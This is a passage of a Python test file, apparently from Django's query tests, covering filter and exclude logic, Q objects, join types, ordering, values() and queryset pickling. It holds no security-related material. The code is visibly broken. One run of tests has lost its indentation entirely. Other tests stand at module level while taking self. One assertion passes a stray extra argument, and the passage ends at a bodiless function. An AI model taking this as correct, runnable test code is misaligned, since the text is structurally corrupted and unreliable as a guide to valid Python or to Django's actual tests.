    def test_ticket2306(self):
        # Checking that no join types are "left outer" joins.
        query = Item.objects.filter(tags=self.t2).query
        self.assertNotIn(LOUTER, [x.join_type for x in query.alias_map.values()])
        self.assertQuerysetEqual(
            Item.objects.filter(Q(tags=self.t1)).order_by('name'),
            ['<Item: one>', '<Item: two>']
        )
        self.assertQuerysetEqual(
            Item.objects.filter(Q(tags=self.t1)).filter(Q(tags=self.t2)),
            ['<Item: one>']
        )
        self.assertQuerysetEqual(
            Item.objects.filter(Q(tags=self.t1)).filter(Q(creator__name='fred') | Q(tags=self.t2)),
            ['<Item: one>']
        )
        # Each filter call is processed "at once" against a single table, so this is
        # different from the previous example as it tries to find tags that are two
        # things at once (rather than two tags).
        self.assertQuerysetEqual(
            Item.objects.filter(Q(tags=self.t1) & Q(tags=self.t2)),
            []
        )
        self.assertQuerysetEqual(
            Item.objects.filter(Q(tags=self.t1), Q(creator__name='fred') | Q(tags=self.t2)),
            []
        )
        qs = Author.objects.filter(ranking__rank=2, ranking__id=self.rank1.id)
        self.assertQuerysetEqual(list(qs), ['<Author: a2>'])
        self.assertEqual(2, qs.query.count_active_tables(), 2)
        qs = Author.objects.filter(ranking__rank=2).filter(ranking__id=self.rank1.id)
        self.assertEqual(qs.query.count_active_tables(), 3)
    def test_ticket4464(self):
        self.assertQuerysetEqual(
            Item.objects.filter(tags=self.t1).filter(tags=self.t2),
            ['<Item: one>']
        )
        self.assertQuerysetEqual(
            Item.objects.filter(tags__in=[self.t1, self.t2]).distinct().order_by('name'),
            ['<Item: one>', '<Item: two>']
        )
        self.assertQuerysetEqual(
            Item.objects.filter(tags__in=[self.t1, self.t2]).filter(tags=self.t3),
            ['<Item: two>']
        )
        # Make sure .distinct() works with slicing (this was broken in Oracle).
        self.assertQuerysetEqual(
            Item.objects.filter(tags__in=[self.t1, self.t2]).order_by('name')[:3],
            ['<Item: one>', '<Item: one>', '<Item: two>']
        )
        self.assertQuerysetEqual(
            Item.objects.filter(tags__in=[self.t1, self.t2]).distinct().order_by('name')[:3],
            ['<Item: one>', '<Item: two>']
        )
    def test_tickets_2080_3592(self):
        self.assertQuerysetEqual(
            Author.objects.filter(item__name='one') | Author.objects.filter(name='a3'),
            ['<Author: a1>', '<Author: a3>']
        )
        self.assertQuerysetEqual(
            Author.objects.filter(Q(item__name='one') | Q(name='a3')),
            ['<Author: a1>', '<Author: a3>']
        )
        self.assertQuerysetEqual(
            Author.objects.filter(Q(name='a3') | Q(item__name='one')),
            ['<Author: a1>', '<Author: a3>']
        )
        self.assertQuerysetEqual(
            Author.objects.filter(Q(item__name='three') | Q(report__name='r3')),
            ['<Author: a2>']
        )
    def test_ticket6074(self):
        # Merging two empty result sets shouldn't leave a queryset with no constraints
        # (which would match everything).
        self.assertQuerysetEqual(Author.objects.filter(Q(id__in=[])), [])
        self.assertQuerysetEqual(
            Author.objects.filter(Q(id__in=[]) | Q(id__in=[])),
            []
        )
def test_tickets_1878_2939(self):
self.assertEqual(Item.objects.values('creator').distinct().count(), 3)
# Create something with a duplicate 'name' so that we can test multi-column
# cases (which require some tricky SQL transformations under the covers).
xx = Item(name='four', created=self.time1, creator=self.a2, note=self.n1)
xx.save()
self.assertEqual(
Item.objects.exclude(name='two').values('creator', 'name').distinct().count(),
4
)
self.assertEqual(
Item.objects.exclude(name='two').extra(select={'foo': '%s'}, select_params=(1,)).values('creator', 'name', 'foo').distinct().count(),
4
)
self.assertEqual(
Item.objects.exclude(name='two').extra(select={'foo': '%s'}, select_params=(1,)).values('creator', 'name').distinct().count(),
4
)
xx.delete()
def test_ticket7323(self):
self.assertEqual(Item.objects.values('creator', 'name').count(), 4)
def test_ticket2253(self):
q1 = Item.objects.order_by('name')
q2 = Item.objects.filter(id=self.i1.id)
self.assertQuerysetEqual(
q1,
['<Item: four>', '<Item: one>', '<Item: three>', '<Item: two>']
)
self.assertQuerysetEqual(q2, ['<Item: one>'])
self.assertQuerysetEqual(
(q1 | q2).order_by('name'),
['<Item: four>', '<Item: one>', '<Item: three>', '<Item: two>']
)
self.assertQuerysetEqual((q1 & q2).order_by('name'), ['<Item: one>'])
q1 = Item.objects.filter(tags=self.t1)
q2 = Item.objects.filter(note=self.n3, tags=self.t2)
q3 = Item.objects.filter(creator=self.a4)
self.assertQuerysetEqual(
((q1 & q2) | q3).order_by('name'),
['<Item: four>', '<Item: one>']
)
def test_order_by_tables(self):
q1 = Item.objects.order_by('name')
q2 = Item.objects.filter(id=self.i1.id)
list(q2)
combined_query = (q1 & q2).order_by('name').query
self.assertEqual(len([
t for t in combined_query.tables if combined_query.alias_refcount[t]
]), 1)
def test_order_by_join_unref(self):
"""
This test is related to the above one, testing that there aren't
old JOINs in the query.
"""
qs = Celebrity.objects.order_by('greatest_fan__fan_of')
self.assertIn('OUTER JOIN', str(qs.query))
qs = qs.order_by('id')
self.assertNotIn('OUTER JOIN', str(qs.query))
def test_tickets_4088_4306(self):
self.assertQuerysetEqual(
Report.objects.filter(creator=1001),
['<Report: r1>']
)
self.assertQuerysetEqual(
Report.objects.filter(creator__num=1001),
['<Report: r1>']
)
self.assertQuerysetEqual(Report.objects.filter(creator__id=1001), [])
self.assertQuerysetEqual(
Report.objects.filter(creator__id=self.a1.id),
['<Report: r1>']
)
self.assertQuerysetEqual(
Report.objects.filter(creator__name='a1'),
['<Report: r1>']
)
def test_ticket4510(self):
    """Reverse FK lookups by a related field's value."""
    reporters = Author.objects.filter(report__name='r1')
    self.assertQuerysetEqual(reporters, ['<Author: a1>'])
def test_ticket7378(self):
    """The reverse related manager yields the author's reports."""
    a1_reports = self.a1.report_set.all()
    self.assertQuerysetEqual(a1_reports, ['<Report: r1>'])
def test_tickets_5324_6704(self):
    """
    Lookups and exclusions across the Item<->Tag m2m relation, plus the
    join-promotion rules (inner vs LEFT OUTER) for the resulting queries.
    """
    self.assertQuerysetEqual(
        Item.objects.filter(tags__name='t4'),
        ['<Item: four>']
    )
    self.assertQuerysetEqual(
        Item.objects.exclude(tags__name='t4').order_by('name').distinct(),
        ['<Item: one>', '<Item: three>', '<Item: two>']
    )
    # reverse() after distinct() flips the explicit ordering.
    self.assertQuerysetEqual(
        Item.objects.exclude(tags__name='t4').order_by('name').distinct().reverse(),
        ['<Item: two>', '<Item: three>', '<Item: one>']
    )
    self.assertQuerysetEqual(
        Author.objects.exclude(item__name='one').distinct().order_by('name'),
        ['<Author: a2>', '<Author: a3>', '<Author: a4>']
    )
    # Excluding across a m2m relation when there is more than one related
    # object associated was problematic.
    self.assertQuerysetEqual(
        Item.objects.exclude(tags__name='t1').order_by('name'),
        ['<Item: four>', '<Item: three>']
    )
    self.assertQuerysetEqual(
        Item.objects.exclude(tags__name='t1').exclude(tags__name='t4'),
        ['<Item: three>']
    )
    # Excluding from a relation that cannot be NULL should not use outer joins.
    query = Item.objects.exclude(creator__in=[self.a1, self.a2]).query
    self.assertNotIn(LOUTER, [x.join_type for x in query.alias_map.values()])
    # Similarly, when one of the joins cannot possibly, ever, involve NULL
    # values (Author -> ExtraInfo, in the following), it should never be
    # promoted to a left outer join. So the following query should only
    # involve one "left outer" join (Author -> Item is 0-to-many).
    qs = Author.objects.filter(id=self.a1.id).filter(Q(extra__note=self.n1) | Q(item__note=self.n3))
    self.assertEqual(
        len([x for x in qs.query.alias_map.values() if x.join_type == LOUTER and qs.query.alias_refcount[x.table_alias]]),
        1
    )
    # The previous changes shouldn't affect nullable foreign key joins.
    self.assertQuerysetEqual(
        Tag.objects.filter(parent__isnull=True).order_by('name'),
        ['<Tag: t1>']
    )
    self.assertQuerysetEqual(
        Tag.objects.exclude(parent__isnull=True).order_by('name'),
        ['<Tag: t2>', '<Tag: t3>', '<Tag: t4>', '<Tag: t5>']
    )
    self.assertQuerysetEqual(
        Tag.objects.exclude(Q(parent__name='t1') | Q(parent__isnull=True)).order_by('name'),
        ['<Tag: t4>', '<Tag: t5>']
    )
    # The same exclusion with the Q operands swapped must give the same rows.
    self.assertQuerysetEqual(
        Tag.objects.exclude(Q(parent__isnull=True) | Q(parent__name='t1')).order_by('name'),
        ['<Tag: t4>', '<Tag: t5>']
    )
    # exclude(Q) and filter(~Q) must agree for a two-level relation.
    self.assertQuerysetEqual(
        Tag.objects.exclude(Q(parent__parent__isnull=True)).order_by('name'),
        ['<Tag: t4>', '<Tag: t5>']
    )
    self.assertQuerysetEqual(
        Tag.objects.filter(~Q(parent__parent__isnull=True)).order_by('name'),
        ['<Tag: t4>', '<Tag: t5>']
    )
def test_ticket2091(self):
    """A model instance inside a list works as a tags__in value."""
    t4 = Tag.objects.get(name='t4')
    matching = Item.objects.filter(tags__in=[t4])
    self.assertQuerysetEqual(matching, ['<Item: four>'])
def test_avoid_infinite_loop_on_too_many_subqueries(self):
    """Nesting far more subqueries than the alias space allows raises RuntimeError."""
    nested = Tag.objects.filter(pk=1)
    local_recursion_limit = 127
    expected_msg = 'Maximum recursion depth exceeded: too many subqueries.'
    with self.assertRaisesMessage(RuntimeError, expected_msg):
        for _ in six.moves.range(local_recursion_limit * 2):
            nested = Tag.objects.filter(pk__in=nested)
def test_reasonable_number_of_subq_aliases(self):
    """Twenty nested subqueries consume the expected T..AN alias sequence."""
    nested = Tag.objects.filter(pk=1)
    for _ in range(20):
        nested = Tag.objects.filter(pk__in=nested)
    expected_aliases = {
        'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'AA', 'AB', 'AC', 'AD',
        'AE', 'AF', 'AG', 'AH', 'AI', 'AJ', 'AK', 'AL', 'AM', 'AN',
    }
    self.assertEqual(nested.query.subq_aliases, expected_aliases)
def test_heterogeneous_qs_combination(self):
    # Combining querysets built on different models should behave in a well-defined
    # fashion. We raise an error.
    expected_msg = 'Cannot combine queries on two different base models.'
    combinations = (
        lambda: Author.objects.all() & Tag.objects.all(),
        lambda: Author.objects.all() | Tag.objects.all(),
    )
    for combine in combinations:
        self.assertRaisesMessage(AssertionError, expected_msg, combine)
def test_ticket3141(self):
    """extra(select=...) must not change count(), with or without params."""
    constant_extra = Author.objects.extra(select={'foo': '1'})
    self.assertEqual(constant_extra.count(), 4)
    parameterized_extra = Author.objects.extra(select={'foo': '%s'}, select_params=(1,))
    self.assertEqual(parameterized_extra.count(), 4)
def test_ticket2400(self):
    """isnull=True on a reverse relation finds the unrelated rows."""
    itemless_authors = Author.objects.filter(item__isnull=True)
    self.assertQuerysetEqual(itemless_authors, ['<Author: a3>'])
    itemless_tags = Tag.objects.filter(item__isnull=True)
    self.assertQuerysetEqual(itemless_tags, ['<Tag: t5>'])
def test_ticket2496(self):
    """extra(tables=...) combined with select_related() and slicing works."""
    joined = Item.objects.extra(tables=['queries_author']).select_related()
    self.assertQuerysetEqual(joined.order_by('name')[:1], ['<Item: four>'])
def test_error_raised_on_filter_with_dictionary(self):
    """Passing a dict positionally to filter() raises a FieldError."""
    bogus_lookup = {'note': 'n1', 'misc': 'foo'}
    with self.assertRaisesMessage(FieldError, 'Cannot parse keyword query as dict'):
        Note.objects.filter(bogus_lookup)
def test_tickets_2076_7256(self):
    """Ordering across relations, including remote models' default ordering."""
    # Ordering on related tables should be possible, even if the table is
    # not otherwise involved.
    self.assertQuerysetEqual(
        Item.objects.order_by('note__note', 'name'),
        ['<Item: two>', '<Item: four>', '<Item: one>', '<Item: three>']
    )
    # Ordering on a related field should use the remote model's default
    # ordering as a final step.
    self.assertQuerysetEqual(
        Author.objects.order_by('extra', '-name'),
        ['<Author: a2>', '<Author: a1>', '<Author: a4>', '<Author: a3>']
    )
    # Using remote model default ordering can span multiple models (in this
    # case, Cover is ordered by Item's default, which uses Note's default).
    self.assertQuerysetEqual(
        Cover.objects.all(),
        ['<Cover: first>', '<Cover: second>']
    )
    # If the remote model does not have a default ordering, we order by its 'id'
    # field.
    self.assertQuerysetEqual(
        Item.objects.order_by('creator', 'name'),
        ['<Item: one>', '<Item: three>', '<Item: two>', '<Item: four>']
    )
    # Ordering by a many-valued attribute (e.g. a many-to-many or reverse
    # ForeignKey) is legal, but the results might not make sense. That
    # isn't Django's problem. Garbage in, garbage out.
    self.assertQuerysetEqual(
        Item.objects.filter(tags__isnull=False).order_by('tags', 'id'),
        ['<Item: one>', '<Item: two>', '<Item: one>', '<Item: two>', '<Item: four>']
    )
    # If we replace the default ordering, Django adjusts the required
    # tables automatically. Item normally requires a join with Note to do
    # the default ordering, but that isn't needed here.
    qs = Item.objects.order_by('name')
    self.assertQuerysetEqual(
        qs,
        ['<Item: four>', '<Item: one>', '<Item: three>', '<Item: two>']
    )
    # Only the base table should remain in the query.
    self.assertEqual(len(qs.query.tables), 1)
def test_tickets_2874_3002(self):
    """
    Ordering by a related field pulls in select_related() data correctly,
    and distinct Note rows stay distinct in the generated SQL.
    """
    qs = Item.objects.select_related().order_by('note__note', 'name')
    self.assertQuerysetEqual(
        qs,
        ['<Item: two>', '<Item: four>', '<Item: one>', '<Item: three>']
    )
    # This is also a good select_related() test because there are multiple
    # Note entries in the SQL. The two Note items should be different.
    # Bug fix: the original line used assertTrue(x, y), which treats ``y``
    # as the failure *message* and so never compared the two values.
    self.assertEqual(repr(qs[0].note), '<Note: n2>')
    self.assertEqual(repr(qs[0].creator.extra.note), '<Note: n1>')
def test_ticket3037(self):
    """OR-ing two multi-keyword Q objects that span a relation."""
    condition = (
        Q(creator__name='a3', name='two') | Q(creator__name='a4', name='four')
    )
    self.assertQuerysetEqual(Item.objects.filter(condition), ['<Item: four>'])
def test_tickets_5321_7070(self):
    """Ordering columns are added to the output, affecting distinct()."""
    # Ordering columns must be included in the output columns. Note that
    # this means results that might otherwise be distinct are not (if there
    # are multiple values in the ordering cols), as in this example. This
    # isn't a bug; it's a warning to be careful with the selection of
    # ordering columns.
    self.assertValueQuerysetEqual(
        Note.objects.values('misc').distinct().order_by('note', '-misc'),
        [{'misc': 'foo'}, {'misc': 'bar'}, {'misc': 'foo'}]
    )
def test_ticket4358(self):
    """values() accepts both "foo" and "foo_id" for relation fields."""
    # If you don't pass any fields to values(), relation fields are
    # returned as "foo_id" keys, not "foo". For consistency, you should be
    # able to pass "foo_id" in the fields list and have it work, too. We
    # actually allow both "foo" and "foo_id".
    # The *_id version is returned by default.
    self.assertIn('note_id', ExtraInfo.objects.values()[0])
    # You can also pass it in explicitly.
    self.assertValueQuerysetEqual(
        ExtraInfo.objects.values('note_id'),
        [{'note_id': 1}, {'note_id': 2}]
    )
    # ...or use the field name.
    self.assertValueQuerysetEqual(
        ExtraInfo.objects.values('note'),
        [{'note': 1}, {'note': 2}]
    )
def test_ticket2902(self):
    """
    extra(select=...) parameters bind to the right columns when an
    OrderedDict fixes the column order, and an extra select column can
    drive order_by().
    """
    # Parameters can be given to extra_select, *if* you use an OrderedDict.
    # (First we need to know which order the keys fall in "naturally" on
    # your system, so we can put things in the wrong way around from
    # normal. A normal dict would thus fail.)
    s = [('a', '%s'), ('b', '%s')]
    params = ['one', 'two']
    # Bug fix: ``{'a': 1, 'b': 2}.keys() == ['a', 'b']`` can never be true
    # on Python 3 (a dict view never equals a list), which made this branch
    # dead there. ``list(d)`` behaves identically on Python 2 and 3.
    if list({'a': 1, 'b': 2}) == ['a', 'b']:
        s.reverse()
        params.reverse()
    # This slightly odd comparison works around the fact that PostgreSQL will
    # return 'one' and 'two' as strings, not Unicode objects. It's a side-effect of
    # using constants here and not a real concern.
    d = Item.objects.extra(select=OrderedDict(s), select_params=params).values('a', 'b')[0]
    self.assertEqual(d, {'a': 'one', 'b': 'two'})
    # Order by the number of tags attached to an item.
    # (renamed from ``l``, which is too easily misread as ``1``)
    by_tag_count = Item.objects.extra(select={'count': 'select count(*) from queries_item_tags where queries_item_tags.item_id = queries_item.id'}).order_by('-count')
    self.assertEqual([o.count for o in by_tag_count], [2, 2, 1, 0])
def test_ticket6154(self):
    """Chained filter() calls are AND-ed regardless of their order."""
    disjunction = Q(extra__note=self.n1) | Q(item__note=self.n3)
    self.assertQuerysetEqual(
        Author.objects.filter(id=self.a1.id).filter(disjunction),
        ['<Author: a1>']
    )
    self.assertQuerysetEqual(
        Author.objects.filter(disjunction).filter(id=self.a1.id),
        ['<Author: a1>']
    )
def test_ticket6981(self):
    """select_related('parent') keeps the full, name-ordered tag list."""
    related = Tag.objects.select_related('parent').order_by('name')
    self.assertQuerysetEqual(
        related,
        ['<Tag: t1>', '<Tag: t2>', '<Tag: t3>', '<Tag: t4>', '<Tag: t5>']
    )
def test_ticket9926(self):
    """Multiple and nested select_related() paths don't change the results."""
    expected = ['<Tag: t1>', '<Tag: t2>', '<Tag: t3>', '<Tag: t4>', '<Tag: t5>']
    for related_paths in (("parent", "category"), ('parent', "parent__category")):
        self.assertQuerysetEqual(
            Tag.objects.select_related(*related_paths).order_by('name'),
            expected
        )
def test_tickets_6180_6203(self):
    """datetimes() respects the requested kind and supports count()/len()."""
    # Dates with limits and/or counts
    self.assertEqual(Item.objects.count(), 4)
    self.assertEqual(Item.objects.datetimes('created', 'month').count(), 1)
    self.assertEqual(Item.objects.datetimes('created', 'day').count(), 2)
    self.assertEqual(len(Item.objects.datetimes('created', 'day')), 2)
    self.assertEqual(Item.objects.datetimes('created', 'day')[0], datetime.datetime(2007, 12, 19, 0, 0))
def test_tickets_7087_12242(self):
    """datetimes() composes with extra(), in either call order."""
    # Dates with extra select columns
    self.assertQuerysetEqual(
        Item.objects.datetimes('created', 'day').extra(select={'a': 1}),
        ['datetime.datetime(2007, 12, 19, 0, 0)', 'datetime.datetime(2007, 12, 20, 0, 0)']
    )
    self.assertQuerysetEqual(
        Item.objects.extra(select={'a': 1}).datetimes('created', 'day'),
        ['datetime.datetime(2007, 12, 19, 0, 0)', 'datetime.datetime(2007, 12, 20, 0, 0)']
    )
    # extra(where=...) narrows the datetimes, again in either order.
    name = "one"
    self.assertQuerysetEqual(
        Item.objects.datetimes('created', 'day').extra(where=['name=%s'], params=[name]),
        ['datetime.datetime(2007, 12, 19, 0, 0)']
    )
    self.assertQuerysetEqual(
        Item.objects.extra(where=['name=%s'], params=[name]).datetimes('created', 'day'),
        ['datetime.datetime(2007, 12, 19, 0, 0)']
    )
def test_ticket7155(self):
    """datetimes() over a nullable field skips NULL values."""
    modified_days = Item.objects.datetimes('modified', 'day')
    self.assertQuerysetEqual(
        modified_days, ['datetime.datetime(2007, 12, 19, 0, 0)']
    )
def test_ticket7098(self):
    """Ordering by a raw "table.column" string still resolves."""
    # Make sure semi-deprecated ordering by related models syntax still
    # works.
    self.assertValueQuerysetEqual(
        Item.objects.values('note__note').order_by('queries_note.note', 'id'),
        [{'note__note': 'n2'}, {'note__note': 'n3'}, {'note__note': 'n3'}, {'note__note': 'n3'}]
    )
def test_ticket7096(self):
    """exclude() with several conditions, including nested negations."""
    # Make sure exclude() with multiple conditions continues to work.
    self.assertQuerysetEqual(
        Tag.objects.filter(parent=self.t1, name='t3').order_by('name'),
        ['<Tag: t3>']
    )
    # exclude() with two kwargs excludes only rows matching *both*.
    self.assertQuerysetEqual(
        Tag.objects.exclude(parent=self.t1, name='t3').order_by('name'),
        ['<Tag: t1>', '<Tag: t2>', '<Tag: t4>', '<Tag: t5>']
    )
    self.assertQuerysetEqual(
        Item.objects.exclude(tags__name='t1', name='one').order_by('name').distinct(),
        ['<Item: four>', '<Item: three>', '<Item: two>']
    )
    self.assertQuerysetEqual(
        Item.objects.filter(name__in=['three', 'four']).exclude(tags__name='t1').order_by('name'),
        ['<Item: four>', '<Item: three>']
    )
    # More twisted cases, involving nested negations.
    self.assertQuerysetEqual(
        Item.objects.exclude(~Q(tags__name='t1', name='one')),
        ['<Item: one>']
    )
    self.assertQuerysetEqual(
        Item.objects.filter(~Q(tags__name='t1', name='one'), name='two'),
        ['<Item: two>']
    )
    self.assertQuerysetEqual(
        Item.objects.exclude(~Q(tags__name='t1', name='one'), name='two'),
        ['<Item: four>', '<Item: one>', '<Item: three>']
    )
def test_tickets_7204_7506(self):
    # Make sure querysets with related fields can be pickled. If this
    # doesn't crash, it's a Good Thing.
    everything = Item.objects.all()
    pickle.dumps(everything)
def test_ticket7813(self):
    # We should also be able to pickle things that use select_related().
    # The only tricky thing here is to ensure that we do the related
    # selections properly after unpickling.
    qs = Item.objects.select_related()
    original_sql = qs.query.get_compiler(qs.db).as_sql()[0]
    restored_query = pickle.loads(pickle.dumps(qs.query))
    restored_sql = restored_query.get_compiler(qs.db).as_sql()[0]
    self.assertEqual(restored_sql, original_sql)
def test_deferred_load_qs_pickling(self):
    # Check pickling of deferred-loading querysets
    deferred = Item.objects.defer('name', 'creator')
    roundtrip_default = pickle.loads(pickle.dumps(deferred))
    self.assertEqual(list(deferred), list(roundtrip_default))
    # Repeat with the highest pickle protocol.
    roundtrip_highest = pickle.loads(pickle.dumps(deferred, pickle.HIGHEST_PROTOCOL))
    self.assertEqual(list(deferred), list(roundtrip_highest))
def test_ticket7277(self):
    """Q lookups may walk tag child chains from a related manager."""
    tag_matches = (
        Q(tag=self.t5) | Q(tag__children=self.t5) | Q(tag__children__children=self.t5)
    )
    self.assertQuerysetEqual(
        self.n1.annotation_set.filter(tag_matches),
        ['<Annotation: a1>']
    )
def test_tickets_7448_7707(self):
    # Complex objects should be converted to strings before being used in
    # lookups.
    created_times = [self.time1, self.time2]
    self.assertQuerysetEqual(
        Item.objects.filter(created__in=created_times),
        ['<Item: one>', '<Item: two>']
    )
def test_ticket7235(self):
    """Every queryset method on a none() queryset yields no rows, no queries."""
    # An EmptyQuerySet should not raise exceptions if it is filtered.
    Eaten.objects.create(meal='m')
    q = Eaten.objects.none()
    # None of these refinements should hit the database.
    with self.assertNumQueries(0):
        self.assertQuerysetEqual(q.all(), [])
        self.assertQuerysetEqual(q.filter(meal='m'), [])
        self.assertQuerysetEqual(q.exclude(meal='m'), [])
        self.assertQuerysetEqual(q.complex_filter({'pk': 1}), [])
        self.assertQuerysetEqual(q.select_related('food'), [])
        self.assertQuerysetEqual(q.annotate(Count('food')), [])
        self.assertQuerysetEqual(q.order_by('meal', 'food'), [])
        self.assertQuerysetEqual(q.distinct(), [])
        self.assertQuerysetEqual(
            q.extra(select={'foo': "1"}),
            []
        )
        # Slicing still locks the query against further modification.
        q.query.low_mark = 1
        self.assertRaisesMessage(
            AssertionError,
            'Cannot change a query once a slice has been taken',
            q.extra, select={'foo': "1"}
        )
        self.assertQuerysetEqual(q.reverse(), [])
        self.assertQuerysetEqual(q.defer('meal'), [])
        self.assertQuerysetEqual(q.only('meal'), [])
def test_ticket7791(self):
    # There were "issues" when ordering and distinct-ing on fields related
    # via ForeignKeys.
    distinct_notes = Note.objects.order_by('extrainfo__info').distinct()
    self.assertEqual(len(distinct_notes), 3)
    # Pickling of DateQuerySets used to fail
    month_qs = Item.objects.datetimes('created', 'month')
    pickle.loads(pickle.dumps(month_qs))
def test_ticket9997(self):
    """Single-field values()/values_list() work as subqueries; multi-field raise."""
    # If a ValuesList or Values queryset is passed as an inner query, we
    # make sure it's only requesting a single value and use that as the
    # thing to select.
    self.assertQuerysetEqual(
        Tag.objects.filter(name__in=Tag.objects.filter(parent=self.t1).values('name')),
        ['<Tag: t2>', '<Tag: t3>']
    )
    # Multi-valued values() and values_list() querysets should raise errors.
    self.assertRaisesMessage(
        TypeError,
        'Cannot use multi-field values as a filter value.',
        lambda: Tag.objects.filter(name__in=Tag.objects.filter(parent=self.t1).values('name', 'id'))
    )
    self.assertRaisesMessage(
        TypeError,
        'Cannot use multi-field values as a filter value.',
        lambda: Tag.objects.filter(name__in=Tag.objects.filter(parent=self.t1).values_list('name', 'id'))
    )
def test_ticket9985(self):
    """values_list(...).values(...) chains work, including as subqueries."""
    # qs.values_list(...).values(...) combinations should work.
    self.assertValueQuerysetEqual(
        Note.objects.values_list("note", flat=True).values("id").order_by("id"),
        [{'id': 1}, {'id': 2}, {'id': 3}]
    )
    self.assertQuerysetEqual(
        Annotation.objects.filter(notes__in=Note.objects.filter(note="n1").values_list('note').values('id')),
        ['<Annotation: a1>']
    )
def test_ticket10205(self):
    # When bailing out early because of an empty "__in" filter, we need
    # to set things up correctly internally so that subqueries can continue properly.
    updated_count = Tag.objects.filter(name__in=()).update(name="foo")
    self.assertEqual(updated_count, 0)
def test_ticket10432(self):
    # Testing an empty "__in" filter with a generator as the value.
    def empty_gen():
        return iter([])
    first_note = Note.objects.all()[0]
    def pk_gen():
        for pk in [first_note.pk]:
            yield pk
    self.assertQuerysetEqual(Note.objects.filter(pk__in=empty_gen()), [])
    self.assertEqual(list(Note.objects.filter(pk__in=pk_gen())), [first_note])
def test_ticket10742(self):
    """Querysets used as __in values stay lazy (no separate subquery run)."""
    # Queries used in an __in clause don't execute subqueries
    subq = Author.objects.filter(num__lt=3000)
    qs = Author.objects.filter(pk__in=subq)
    self.assertQuerysetEqual(qs, ['<Author: a1>', '<Author: a2>'])
    # The subquery result cache should not be populated
    self.assertIsNone(subq._result_cache)
    # Same for exclude().
    subq = Author.objects.filter(num__lt=3000)
    qs = Author.objects.exclude(pk__in=subq)
    self.assertQuerysetEqual(qs, ['<Author: a3>', '<Author: a4>'])
    # The subquery result cache should not be populated
    self.assertIsNone(subq._result_cache)
    # And when combined with another condition via Q objects.
    subq = Author.objects.filter(num__lt=3000)
    self.assertQuerysetEqual(
        Author.objects.filter(Q(pk__in=subq) & Q(name='a1')),
        ['<Author: a1>']
    )
    # The subquery result cache should not be populated
    self.assertIsNone(subq._result_cache)
def test_ticket7076(self):
    # Excluding shouldn't eliminate NULL entries.
    unmodified_items = Item.objects.exclude(modified=self.time1).order_by('name')
    self.assertQuerysetEqual(
        unmodified_items,
        ['<Item: four>', '<Item: three>', '<Item: two>']
    )
    non_t1_children = Tag.objects.exclude(parent__name=self.t1.name)
    self.assertQuerysetEqual(
        non_t1_children,
        ['<Tag: t1>', '<Tag: t4>', '<Tag: t5>']
    )
def test_ticket7181(self):
    """Ordering over nullable relations, and merging with none() querysets."""
    # Ordering by related tables should accommodate nullable fields (this
    # test is a little tricky, since NULL ordering is database dependent.
    # Instead, we just count the number of results).
    self.assertEqual(len(Tag.objects.order_by('parent__name')), 5)
    # Empty querysets can be merged with others.
    self.assertQuerysetEqual(
        Note.objects.none() | Note.objects.all(),
        ['<Note: n1>', '<Note: n2>', '<Note: n3>']
    )
    self.assertQuerysetEqual(
        Note.objects.all() | Note.objects.none(),
        ['<Note: n1>', '<Note: n2>', '<Note: n3>']
    )
    # ANDing with an empty queryset gives an empty result, either way round.
    self.assertQuerysetEqual(Note.objects.none() & Note.objects.all(), [])
    self.assertQuerysetEqual(Note.objects.all() & Note.objects.none(), [])
def test_ticket9411(self):
    # Make sure bump_prefix() (an internal Query method) doesn't (re-)break. It's
    # sufficient that this query runs without error.
    id_qs = Tag.objects.values_list('id', flat=True).order_by('id')
    id_qs.query.bump_prefix(id_qs.query)
    lowest_id = id_qs[0]
    self.assertEqual(list(id_qs), list(range(lowest_id, lowest_id + 5)))
def test_ticket8439(self):
    """OR-ed Q objects over nullable relations promote joins correctly."""
    # Complex combinations of conjunctions, disjunctions and nullable
    # relations.
    self.assertQuerysetEqual(
        Author.objects.filter(Q(item__note__extrainfo=self.e2) | Q(report=self.r1, name='xyz')),
        ['<Author: a2>']
    )
    # The same disjunction with its operands swapped must match too.
    self.assertQuerysetEqual(
        Author.objects.filter(Q(report=self.r1, name='xyz') | Q(item__note__extrainfo=self.e2)),
        ['<Author: a2>']
    )
    self.assertQuerysetEqual(
        Annotation.objects.filter(Q(tag__parent=self.t1) | Q(notes__note='n1', name='a1')),
        ['<Annotation: a1>']
    )
    xx = ExtraInfo.objects.create(info='xx', note=self.n3)
    self.assertQuerysetEqual(
        Note.objects.filter(Q(extrainfo__author=self.a1) | Q(extrainfo=xx)),
        ['<Note: n1>', '<Note: n3>']
    )
    # Exactly one referenced LEFT OUTER join should remain in the query.
    q = Note.objects.filter(Q(extrainfo__author=self.a1) | Q(extrainfo=xx)).query
    self.assertEqual(
        len([x for x in q.alias_map.values() if x.join_type == LOUTER and q.alias_refcount[x.table_alias]]),
        1
    )
def test_ticket17429(self):
    """
    Ensure that Meta.ordering=None works the same as Meta.ordering=[]
    """
    original_ordering = Tag._meta.ordering
    Tag._meta.ordering = None
    # Restore the class-level ordering even if the assertion fails, so
    # other tests are not affected.
    try:
        self.assertQuerysetEqual(
            Tag.objects.all(),
            ['<Tag: t1>', '<Tag: t2>', '<Tag: t3>', '<Tag: t4>', '<Tag: t5>'],
            ordered=False
        )
    finally:
        Tag._meta.ordering = original_ordering
def test_exclude(self):
    """exclude(cond) is equivalent to filter(~cond) for these lookups."""
    conditions = (
        Q(tags__name='t4'),
        Q(tags__name='t4') | Q(tags__name='t3'),
        Q(tags__name='t4') | ~Q(tags__name='t3'),
    )
    for condition in conditions:
        self.assertQuerysetEqual(
            Item.objects.exclude(condition),
            [repr(i) for i in Item.objects.filter(~condition)])
def test_nested_exclude(self):
    """exclude(~cond) matches filter(~~cond)."""
    double_negated = Item.objects.filter(~~Q(tags__name='t4'))
    self.assertQuerysetEqual(
        Item.objects.exclude(~Q(tags__name='t4')),
        [repr(i) for i in double_negated])
def test_double_exclude(self):
    """filter(cond) matches both spellings of a double negation."""
    positive = Item.objects.filter(Q(tags__name='t4'))
    for doubled in (~~Q(tags__name='t4'), ~Q(~Q(tags__name='t4'))):
        self.assertQuerysetEqual(
            positive,
            [repr(i) for i in Item.objects.filter(doubled)])
def test_exclude_in(self):
    """The negation equivalences hold for __in lookups too."""
    condition = Q(tags__name__in=['t4', 't3'])
    self.assertQuerysetEqual(
        Item.objects.exclude(condition),
        [repr(i) for i in Item.objects.filter(~condition)])
    self.assertQuerysetEqual(
        Item.objects.filter(condition),
        [repr(i) for i in Item.objects.filter(~~condition)])
def test_ticket_10790_1(self):
    """Direct isnull lookups over a nullable FK need no join at all."""
